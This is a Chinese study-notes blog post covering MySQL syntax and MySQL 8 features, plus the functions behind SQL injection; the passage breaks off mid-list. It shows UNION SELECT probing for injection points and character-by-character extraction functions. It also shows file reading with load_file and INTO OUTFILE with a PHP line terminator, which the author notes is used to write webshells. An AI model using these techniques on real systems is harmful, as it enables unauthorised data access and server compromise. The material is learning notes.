<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="mysql数据库与sql注入学习笔记, Atmujie">
    <meta name="description" content="有一美人兮，见之不忘，一日不见兮，思之如狂；">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>mysql数据库与sql注入学习笔记 | Atmujie</title>
    <link rel="icon" type="image/png" href="/weblogo.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Atmujie</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="" class="waves-effect waves-light">

      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/friends">
          
          <i class="fas fa-address-book" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>Friends</span>
        </a>
      </li>
      
      <li>
        <a href="/BlogLink">
          
          <i class="fas fa-address-book" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>BlogLink</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Atmujie</div>
        <div class="logo-desc">
            
            有一美人兮，见之不忘，一日不见兮，思之如狂；
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-address-book"></i>
			
			友情链接
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>

                  <a href="/friends " style="margin-left:75px">
				  
				   <i class="fa fas fa-address-book" style="position: absolute;left:50px" ></i>
			      
		          <span>Friends</span>
                  </a>
                </li>
              
                <li>

                  <a href="/BlogLink " style="margin-left:75px">
				  
				   <i class="fa fas fa-address-book" style="position: absolute;left:50px" ></i>
			      
		          <span>BlogLink</span>
                  </a>
                </li>
              
            </ul>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/2.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">mysql数据库与sql注入学习笔记</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/">
                                <span class="chip bg-color">数据库</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-12-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="MySQL基础"><a href="#MySQL基础" class="headerlink" title="MySQL基础"></a>MySQL基础</h1><h2 id="SQL-基础语句"><a href="#SQL-基础语句" class="headerlink" title="SQL 基础语句"></a>SQL 基础语句</h2><ul>
<li><p>连接数据库服务器  </p>
<blockquote>
<p>设置环境变量后直接终端输入mysql<br>格式：mysql -u [用户名] -p [密码]<br>或：mysql -u [用户名] -p （回车）<br>  密码：*********  </p>
</blockquote>
</li>
<li><p>查看数据库服务器中的数据库  </p>
<blockquote>
<p>show databases;  </p>
</blockquote>
</li>
<li><p>进入数据库  </p>
<blockquote>
<p>use [库名];  </p>
</blockquote>
</li>
<li><p>查看数据库</p>
<blockquote>
<p>查看数据库中的所有表<br>show tables;<br>查看库中一个表所有数据<br>select<em>from [表名];<br>查看表中指定列<br>select [列名] from [表名];<br>查看表中指定内容数据<br>selec</em>from [表名] where id=[指定值];  </p>
</blockquote>
</li>
<li><p>在数据库服务器中创建数据库  </p>
<blockquote>
<p>create [库名];  </p>
</blockquote>
</li>
<li><p>在数据库中创建表  </p>
<blockquote>
<p>create table [表名]<br>(<br>   [第一列列名] [数据类型(长度\值)],<br>   [第二列列名] [数据类型(长度\值)],<br>   ……..<br>   [第n列列名] [数据类型(长度\值)]<br>);  </p>
</blockquote>
</li>
<li><p>查看数据表详情  </p>
<blockquote>
<p>describe [表名];  </p>
</blockquote>
</li>
<li><p>向表中插入数据<br>insert into [表名]<br> values(“[第一行要输入的值]”,”[第二行要输入的值]”,”[第。。。要输入的值]”,”[最后一行要输入的值]”);  </p>
</li>
<li><p>删除命令  </p>
<blockquote>
<p>drop<br>删除数据库 drop database [库名];<br>删除数据库中的表 drop table [表名];  </p>
</blockquote>
</li>
<li><p>删除表中数据  </p>
<blockquote>
<p>delete from [表名] where [行名=内容];  </p>
</blockquote>
</li>
<li><p>修改表中数据  </p>
<blockquote>
<p>update [表名] set [行名=”修改后内容”];<br>alter table [表名] add/drop/change [字段名 值];</p>
</blockquote>
</li>
<li><p>写文件  </p>
<blockquote>
<p>into outfile<br>格式：select “hello world” into outfile “[文件名/绝对路径或相对路径分情况使用]”;<br>全新版本（注入写入）：select * from users into outfile “[路径+文件名]” lines terminated by “[字符串1]”;<br> //意为users表中每一行数据都以字符串一结尾。</p>
</blockquote>
</li>
<li><p>读文件  </p>
<blockquote>
<p>load_file<br>格式：select load_file “[要读取的文件]”;  </p>
</blockquote>
</li>
<li><p>注意：写入绝对路径时’/‘容易被作为转义符，所以通常需用到’//‘  </p>
</li>
<li><p>重命名</p>
<blockquote>
<p>rename<br>格式：rename tables/columns/databases “[表/列/数据库名]” to “[新名字]”;</p>
</blockquote>
</li>
<li><p>总结<br><img src="1.png" alt="1"></p>
</li>
</ul>
<h2 id="建表约束"><a href="#建表约束" class="headerlink" title="建表约束"></a>建表约束</h2><ul>
<li><p>主键约束 </p>
<blockquote>
<p>primary key<br>主键约束能唯一确定一张表中的一条记录<br>即我们通过给某个字段添加主键约束，就能确保该记录不重复且不为空。<br>例：<br>create table mujie<br>(<br>  id int primary key,<br>  name varchar(40);<br>);<br><img src="2.png" alt="2"></p>
</blockquote>
<blockquote>
<p>联合主键<br>同时定义多个主键约束，只要有一个不重复，那么两条记录就可以正常输入。<br>例如：<br>creste table mujie(id int,name varchar(20),message varchar(60),primary key(id,name));<br>该例子定义了俩个列为主键约束<br><img src="3.png" alt="3">此时，若输入两组name和id其中之一不同的数据，均可正常输入，只有两组数据name和id均相同，才无法输入。<br>注意：即使是联合主键，也不能有任意一项为空。  </p>
</blockquote>
</li>
<li><p>自增约束  </p>
<blockquote>
<p>auto_increment<br>与主键约束配合使用<br>例如：<br>  create table mujie<br>(<br>  id int primary key auto_increment,<br>  name varchar(40);<br>);   </p>
</blockquote>
</li>
</ul>
<ul>
<li><p>唯一约束<br>唯一约束如其字面意思，约束一列中不能出现重复数据。    </p>
<blockquote>
<p>命令 unique 英文译：独一无二的。  </p>
</blockquote>
<blockquote>
<p>使用方法与主键约束相同部分：<br>-联合唯一的用法与联合主键相同。<br>-用add添加约束与主键相同。<br>-用modify修改列从而修改约束与主键相同。  </p>
</blockquote>
<blockquote>
<p>使用方法与主键约束不同部分：<br>-删除唯一约束与删除主键约束不同<br>唯一约束的删除：<br>drop index //删除索引。<br>格式：<br>alter table [表名] drop index [列名];  </p>
</blockquote>
</li>
<li><p>非空约束  </p>
<blockquote>
<p>规定该列的内容不为空(NULL)</p>
</blockquote>
</li>
<li><p>修改创建完成的表    </p>
<ul>
<li>添加主键约束。  <blockquote>
<p>通过常用的添加操作添加主键约束。<br>alter table [表名] add <a href="%E5%88%97%E5%90%8D">约束</a>;<br>例如：alter table mujie add primary key(id); //给id这个列添加主键约束。  </p>
</blockquote>
</li>
</ul>
<blockquote>
<p>通过修改列添加主键约束。<br>alter table [表名]  modify [列名] [数据类型] <a href="%E5%88%97%E5%90%8D">约束</a>;<br>例如： alter table mujie modify id int primary key(id) auto_increment; //修改表mujie中的id列为整型<br>通过修改删除约束同理，不输入约束即可。  </p>
</blockquote>
<blockquote>
<p>alter table [表名] drop[约束]; //删除主键约束。<br>例如：alter table mujie drop primary key; //删除mujie这个表中的主键约束。  </p>
</blockquote>
</li>
</ul>
<h1 id="MYSQL-8-0-19新特性"><a href="#MYSQL-8-0-19新特性" class="headerlink" title="MYSQL:8.0.19新特性"></a>MYSQL:8.0.19新特性</h1><h2 id="MYSQL8安装"><a href="#MYSQL8安装" class="headerlink" title="MYSQL8安装"></a>MYSQL8安装</h2><p>phpstudy集成环境最高到mysql:8.0.12，而mysql:8.0.12并没有新增我们需要的新特性</p>
<p>安装方法</p>
<ul>
<li>windows 系统：官网下载安装包到本地，配置环境变量，初始化</li>
<li>linux 系统，同样官网安装</li>
<li>docker ： docker pull mysql:8.0.19</li>
</ul>
<p>这里我推荐使用docker 安装mysql:8.0.19</p>
<h3 id="安装步骤"><a href="#安装步骤" class="headerlink" title="安装步骤"></a>安装步骤</h3><p>安装镜像：</p>
<pre class="line-numbers language-docker"><code class="language-docker">sudo docker pull mysql<span class="token punctuation">:</span>8.0.19 
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>docker run 容器:</p>
<pre class="line-numbers language-docker"><code class="language-docker">sudo docker run <span class="token punctuation">-</span><span class="token punctuation">-</span>name=<span class="token string">"mysql8"</span> <span class="token punctuation">-</span>p 3360<span class="token punctuation">:</span>3306 <span class="token punctuation">-</span>v /my/data/mysql8/<span class="token punctuation">:</span>/var/lib/mysql/ <span class="token punctuation">-</span>e MYSQL_ROOT_POSSWORD=root mysql<span class="token punctuation">:</span>8.0.19
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>卷挂载路径：</p>
<pre class="line-numbers language-docker"><code class="language-docker">/var/lib/mysql/  数据存储目录
/etc/mysql/  mysql配置目录
/var/log/  日志存储目录
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>卷的具体挂载可自行选择</p>
<p>启动容器</p>
<pre class="line-numbers language-docker"><code class="language-docker">sudo docker start mysql8
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>进入容器</p>
<pre class="line-numbers language-docker"><code class="language-docker">sudo docker exec <span class="token punctuation">-</span>it mysql8 /bin/bash
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>进入mysql8</p>
<pre class="line-numbers language-sq"><code class="language-sq">mysql -u root -p
root
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>安装完成</p>
<h2 id="语句新增"><a href="#语句新增" class="headerlink" title="语句新增"></a>语句新增</h2><h3 id="table语句"><a href="#table语句" class="headerlink" title="table语句"></a>table语句</h3><ul>
<li><p>查询语句</p>
<p>  <strong>table [表名]；</strong></p>
<p>  同之前版本的select * from 【表名】; 都可以显示表的全部信息</p>
<p>  <img src="image-20210528173723745.png" alt="image-20210528173723745"></p>
<p>  支持语法：</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">TABLE</span> table_name <span class="token punctuation">[</span><span class="token keyword">ORDER</span> <span class="token keyword">BY</span> column_name<span class="token punctuation">]</span> <span class="token punctuation">[</span><span class="token keyword">LIMIT</span> number <span class="token punctuation">[</span><span class="token keyword">OFFSET</span> number<span class="token punctuation">]</span><span class="token punctuation">]</span>
<span class="token comment" spellcheck="true">#该语句支持使用order by 和limit 语句进行查询</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>  order by </p>
<p>  <img src="image-20210528174058762.png" alt="image-20210528174058762"></p>
<p>  limit 1,2</p>
<p>  <img src="image-20210528174152993.png" alt="image-20210528174152993"></p>
</li>
</ul>
<h3 id="values语句"><a href="#values语句" class="headerlink" title="values语句"></a>values语句</h3><ul>
<li><p>官方语法：</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">VALUES</span> row_constructor_list <span class="token punctuation">[</span><span class="token keyword">ORDER</span> <span class="token keyword">BY</span> column_designator<span class="token punctuation">]</span> <span class="token punctuation">[</span><span class="token keyword">LIMIT</span> <span class="token keyword">BY</span> number<span class="token punctuation">]</span>row_constructor_list:<span class="token keyword">ROW</span><span class="token punctuation">(</span>value_list<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">,</span> <span class="token keyword">ROW</span><span class="token punctuation">(</span>value_list<span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token punctuation">,</span> <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">]</span>value_list:<span class="token keyword">value</span><span class="token punctuation">[</span><span class="token punctuation">,</span> <span class="token keyword">value</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token punctuation">,</span> <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">]</span>column_designator:column_index
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
</ul>
<p>解析：</p>
<ul>
<li><p>values row()语句：</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  构造一个虚拟表，值为1，2，3 row译为行</p>
<p>  这个语句可以构造多行数据</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">row</span><span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">row</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">,</span><span class="token string">"b"</span><span class="token punctuation">,</span><span class="token string">"c"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  <img src="image-20210528192350589.png" alt="image-20210528192350589"></p>
<p>  vlaues row()语句可接入多种语句中执行</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> mujie<span class="token punctuation">;</span> 
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  <img src="image-20210528192733112.png" alt="image-20210528192733112"></p>
<p>  或者：</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> mujie <span class="token keyword">where</span> id<span class="token operator">=</span><span class="token number">1</span> <span class="token operator">and</span> <span class="token number">1</span><span class="token operator">^</span><span class="token number">2</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token punctuation">`</span><span class="token number">3</span><span class="token punctuation">`</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">3</span> <span class="token keyword">union</span>  <span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token number">a</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  总的来说 values row() 语句就是提供了类似select 1,2,3 的功能，当使用values语句可以一次定义更多的虚拟数据</p>
<p>  除了构建虚拟表，values row()语句还可以快速创建真实的表</p>
<p>  values row()语句定义列名，需配合select 使用</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">as</span> xxx<span class="token punctuation">(</span>id<span class="token punctuation">,</span>username<span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>  <img src="image-20210528194924357.png" alt="image-20210528194924357"></p>
<p>  配合create table 语句</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">create</span> <span class="token keyword">table</span> users
<span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">as</span> xxx<span class="token punctuation">(</span>id<span class="token punctuation">,</span>username<span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>  <img src="image-20210528195303944.png" alt="image-20210528195303944"></p>
<p>  定义表的类型</p>
<pre class="line-numbers language-sql"><code class="language-sql"><span class="token keyword">create</span> <span class="token keyword">table</span> userss <span class="token punctuation">(</span>id <span class="token keyword">int</span><span class="token punctuation">,</span>username char<span class="token punctuation">,</span>password char<span class="token punctuation">)</span>
<span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">values</span> <span class="token keyword">row</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">as</span> xxx<span class="token punctuation">(</span>id<span class="token punctuation">,</span>username<span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>  <img src="image-20210528195846823-1622203128475.png" alt="image-20210528195846823"></p>
<p>  以上就是mysql8在命令部分的新特性，可用于注入攻击</p>
</li>
</ul>
<h1 id="注入部分"><a href="#注入部分" class="headerlink" title="注入部分"></a>注入部分</h1><h2 id="select-from-命令控制语句"><a href="#select-from-命令控制语句" class="headerlink" title="select * from 命令控制语句"></a>select * from 命令控制语句</h2><h3 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h3><ul>
<li><p>limit 语句  </p>
<blockquote>
<p>例如：limit 0,1 //从第一个值开始，输出一个值<br>limit 1,2 //从第二个开始，输出两个<br>以此类推  </p>
</blockquote>
</li>
<li><p>order by 命令  </p>
<blockquote>
<p>英译：排序  </p>
</blockquote>
</li>
</ul>
<blockquote>
<p>升降排序<br>  用于对结果集按照一个列或者多个列进行排序。<br>  命令格式：<br>  order by [列1];//将数据按列1顺序升序排列<br>  order by [列2] DESC;//将数据按列2顺序降序排序<br>  ASC 升序，使用order by一般默认升序排序<br>  DESC 降序;<br>  注意：ASC和DESC只对它紧跟着的第一个列名有效，其他不受影响，仍然是默认的升序。  </p>
</blockquote>
<blockquote>
<p>确定列数(指定列排序)<br>  order by语句可以不输入列名，而是输入数字表示具体列<br>  如order by 1 ;表示对第一列进行排序  </p>
</blockquote>
<ul>
<li>联合查询(union语句)  <blockquote>
<p>英译：联合  </p>
</blockquote>
</li>
</ul>
<blockquote>
<p>UNION 操作符用于合并两个或多个 SELECT 语句的结果集。<br>  请注意，UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。<br>  同时，每个 SELECT 语句中的列的顺序必须相同。<br>  默认地，UNION 操作符选取不同的值。如果允许重复的值，需使用 UNION ALL。  </p>
</blockquote>
<blockquote>
<p>union语法<br>  select [列1名] from [表1名]<br>  union<br>  select [列2名] form [表2名];<br>  //联合查询表1中列1和表2中列2，并输出其中所有内容(value)【不重复】。<br>  使用union all 可输出重复的内容。<br>  语句后可加入order by / where 语句注释联合查询结果。</p>
</blockquote>
<blockquote>
<p>union select [数字组]//例如：union select 1,2,3;<br>  我们写的一串数字就是一个数组（或1个行向量），这时select实际上没有向任何一个数据库查询数据，即查询命令不指向任何数据库的表。返回值就是我们输入的这个数组。<br>  select直接加数字串不指向任何数据库的表，用于找到数据库与前端显示的通道，确定注入点。  </p>
</blockquote>
<ul>
<li><p>concat()函数  </p>
<blockquote>
<p>功能：将多个字符串连接成一个字符串。<br>返回结果为连接参数产生的字符串，如果有任何一个参数为null，则返回值为null。<br>语法：concat(str1, str2,…)<br>例1:select concat (id, name, score) as info from tt2;<br>//将表tt2中的id,name,score连接起来，输出到info中。<br><img src="4.png" alt="4"></p>
</blockquote>
</li>
<li><p>concat_ws()函数  </p>
<blockquote>
<p>和concat()一样，将多个字符串连接成一个字符串，但是可以一次性指定分隔符～（concat_ws就是concat with separator）<br>语法：concat_ws(separator, str1, str2, …)<br>说明：第一个参数指定分隔符。需要注意的是分隔符不能为null，如果为null，则返回结果为null。<br>例如：concat_ws(‘,’,id,name,sorce) as info from tt2;  </p>
</blockquote>
   </li>
<li><p>group by 语句  </p>
<blockquote>
<p>英译：分组依据<br>用途如字面意思，通过by后的规则进行分组<br>所谓的分组就是将一个“数据集”划分成若干个“小区域”，然后针对若干个“小区域”进行数据处理。<br>举例：<br>select 类别, sum(数量) as 数量之和<br>from A   png<br>group by 类别<br><img src="5.png" alt="5"></p>
</blockquote>
</li>
<li><p>group_concat() 函数  </p>
<blockquote>
<p>功能：将group by产生的同一个分组中的值连接起来，返回一个字符串结果。<br>相当于执行完group by 后再次执行concat()语句。<br>语法：group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )<br>//distinct 英译：不同的。  可以排除重复值。<br>如果希望对结果中的值进行排序，可以使用order by子句<br>separator是一个字符串值，不进行规定默认为一个逗号。  </p>
</blockquote>
  </li>
<li><p>lines terminated by 方法</p>
<blockquote>
<p>意为：每行都以…结尾<br>例如：lines terminated by ‘<?php "hello world"?>‘<br>每行都以单引号中的内容结束<br>常配合into outfile写入木马</p>
</blockquote>
</li>
<li><p>schema  </p>
<blockquote>
<p>英译：模式，架构<br>schema定义了表、每个表的字段，还有表和字段之间的关系。<br>简单说schema是开发者创建的，储存表、列信息的特殊数据库。<br>如果把database看作是一个仓库，仓库很多房间（schema），一个schema代表一个房间，table可以看作是每个房间中的储物柜，user是每个schema的主人，有操作数据库中每个房间的权利，就是说每个数据库映射user有每个schema（房间）的钥匙。<br>在mysql中，database与schema等价。  </p>
</blockquote>
</li>
</ul>
<h3 id="截取字符串"><a href="#截取字符串" class="headerlink" title="截取字符串"></a>截取字符串</h3><ul>
<li><p>left()函数  </p>
<blockquote>
<p>left 英译：左边<br>语法：left（参数1，参数2） 意为 将参数1从左开始取参数2个<br>例如：left(abc,2) //将abc从左边取两位<br>注：此时无返回值<br>加入判断语句：<br>left(abc,1) &gt; “a”  //成立返回1，不成立返回0;  </p>
</blockquote>
</li>
<li><p>mid()函数  </p>
<blockquote>
<p>mid 译为中间<br>此函数为截取字符串一部分。<br>语法：mid(column_name,start[,length])<br>start：起始值，mid函数用于将字符串从起始值(从1开始)开始截取指定位数<br>length:指定截取位数<br>例如：mid(abcdefg,1,1)  //从“abcdefg”中第一个开始截取一字符<br>同left，加入判断语句可得到返回值  </p>
</blockquote>
</li>
<li><p>substr()函数[等同于substring()函数]   </p>
<blockquote>
<p>substr 译：正则表达式<br>功能同mid()函数<br>语法:substr(string,start,length)<br>string为字符串，可以是sql语句,其他内容与mid()相同<br>例如：substr(123456,2,1)=2 //判断第二个是否为二，是返回正确(1)，不是返回(0)  </p>
</blockquote>
</li>
<li><p>ord()函数  </p>
<blockquote>
<p>功能同mid，但会将得到的字符串转化为ASCII码值，常与前三个函数连用  </p>
</blockquote>
</li>
<li><p>ascii()函数  </p>
<blockquote>
<p>将括号内的字符串转化为ascii码值  </p>
</blockquote>
</li>
<li><p>regexp 方法  </p>
<blockquote>
<p>正则表达式函数，用与匹配文本，支持where指定<br>语法：select [表] from [数据库] where [指定检索] regexp ‘[关键字]’;<br>返回数据库/表/列中含有关键字的数据。<br>例如：select users from security where security.users regexp ‘^abc|^123|123|password$’;<br>//返回users表中以abc开头或以123开头或含有123或以password结尾的数据。  </p>
</blockquote>
</li>
</ul>
<blockquote>
<p>符号解析：<br> ^ ：用字符串前，表示以此字符串开头<br> | ：用于两字符串中间，表示或<br> $ ：用于字符串末尾，表示以此字符串结尾<br> 上述三个符号可以连用<br> 特别的：<br> [字符串1]字符串2 ：用于写有重复字符的或语句<br> 如：[abc]1  //返回含有a1或b1或c1的字符串<br> 也可以写为[a-c]1，返回结果一致  </p>
</blockquote>
<ul>
<li>like 方法  <blockquote>
